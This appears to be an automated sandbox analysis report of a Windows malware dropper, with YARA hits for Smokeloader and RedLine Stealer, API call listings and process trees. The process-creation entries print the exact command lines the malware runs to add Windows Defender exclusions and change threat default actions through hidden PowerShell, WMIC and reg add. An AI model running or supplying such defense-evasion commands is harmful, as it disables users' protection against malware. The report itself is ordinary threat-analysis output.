Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_00401635 NtDuplicateObject,NtCreateSection,VirtualProtect,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401635
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033D2 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033D2
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033E1 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033E1
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033FB NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033FB
Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe	Code function: 8_2_004033B7 NtClose,LdrLoadDll,RtlZeroMemory,GetModuleHandleA,	8_2_004033B7

Creates files inside the system directory

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\gpt.ini
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\Machine
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\User
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Source: C:\Windows\SysWOW64\schtasks.exe	File created: C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job

Detected potential crypto function

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359EB10	0_2_00007FF7E359EB10
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3588F50	0_2_00007FF7E3588F50
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A0560	0_2_00007FF7E35A0560
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359DC30	0_2_00007FF7E359DC30
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359F360	0_2_00007FF7E359F360
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A2290	0_2_00007FF7E35A2290
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3582A60	0_2_00007FF7E3582A60
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358E2F0	0_2_00007FF7E358E2F0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E359C160	0_2_00007FF7E359C160
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3592934	0_2_00007FF7E3592934
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35969D0	0_2_00007FF7E35969D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A89D0	0_2_00007FF7E35A89D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35869D0	0_2_00007FF7E35869D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3594890	0_2_00007FF7E3594890
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35988C0	0_2_00007FF7E35988C0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35940D0	0_2_00007FF7E35940D0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A3F70	0_2_00007FF7E35A3F70
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3583720	0_2_00007FF7E3583720
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A1800	0_2_00007FF7E35A1800
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3593010	0_2_00007FF7E3593010
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35957F0	0_2_00007FF7E35957F0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358F7F4	0_2_00007FF7E358F7F4
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A2700	0_2_00007FF7E35A2700
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3597F10	0_2_00007FF7E3597F10
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3577EC0	0_2_00007FF7E3577EC0
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E3598D40	0_2_00007FF7E3598D40
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E35A3600	0_2_00007FF7E35A3600
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: 0_2_00007FF7E358FDA0	0_2_00007FF7E358FDA0
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004162A6	18_2_004162A6
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040E5A5	18_2_0040E5A5
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004126B0	18_2_004126B0
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00403A01	18_2_00403A01
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00418EF1	18_2_00418EF1
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_00418FCB	18_2_00418FCB

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe DD0E8944471F44180DD44807D817E0B8A1C931FC67D48278CDB7354D98567E7C

Found potential string decryption / allocating functions

Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89C89 appears 69 times
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89C56 appears 419 times
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Code function: String function: 04C89CBF appears 115 times
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: String function: 00413954 appears 179 times
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Code function: String function: 00007FF7E3579B60 appears 51 times

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8028 -ip 8028

PE / OLE file has an invalid certificate

Source: lgX7lgUL1w.exe

Static PE information: invalid certificate

PE file contains executable resources (Code or Archives)

Source: 6up3Hll278RsXeDsUnv7AmsU.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: H0hJPxhIO3F6BQNxVzuoHmfd.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: 3wIIRe1QiHmGmyDfkt1MdfjR.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: xHjBfoMXM1Bms4i9lirVpf5B.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: v0F2dmnMQ8GuOxPTeGs09I9Y.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: GEHqSaIn1rPu3OTaMO2vs7UL.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: IMmyv1eSkv8WoF4sKRLh3j87.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: bVGflEGYToK4vU6iMb86uQ6v.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: hmtNBhlQWScQGAc2r9fH2laz.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression
Source: LAD11vkv57kHfnlhAFxxWdEz.exe.5.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 423228 bytes, 1 file, at 0x2c +A "360P2SP.dll", number 1, 26 datablocks, 0x1 compression

Sample file is different than original file name gathered from version info

Source: lgX7lgUL1w.exe	Binary or memory string: OriginalFilename vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1212207092.00000233C0572000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1214500875.00000233C7774000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNew.exe" vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe, 00000000.00000002.1213026892.00000233C4800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe
Source: lgX7lgUL1w.exe	Binary or memory string: OriginalFilenameIsMacCatalystVersionAtLeastGetStream.dllj% vs lgX7lgUL1w.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

Yara signature match

Source: lgX7lgUL1w.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF
Source: 00000026.00000002.2581381822.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.1706196423.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.1769205035.000000000301B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.1731271507.0000000002F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000026.00000002.2621741485.0000000002E5B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCMD author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP utility, command line and INF

Source: classification engine

Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@173/255@0/54

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Code function: 0_2_00007FF7E3582890 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,

0_2_00007FF7E3582890

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

Code function: 8_2_030225B2 CreateToolhelp32Snapshot,Module32First,

8_2_030225B2

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File created: C:\Users\user\lgX7lgUL1w.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Mutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe	Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 7280
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Mutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_15
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8284:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8028
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:8188:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrsojfea.jbs.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1305731063.00000000004E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

Source: lgX7lgUL1w.exe

Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\lgX7lgUL1w.exe

File read: C:\Users\user\Desktop\lgX7lgUL1w.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lgX7lgUL1w.exe "C:\Users\user\Desktop\lgX7lgUL1w.exe"
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lgX7lgUL1w.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe "C:\Users\user\Pictures\xJOdjN6fVDYC0Ta4cXD9JBiF.exe" /s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe "C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe "C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe "C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe"
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Process created: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe .\Install.exe /odidum "385118" /S
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe "C:\Users\user\Pictures\E6ijlcXzCqRG7r61JO0b9evs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
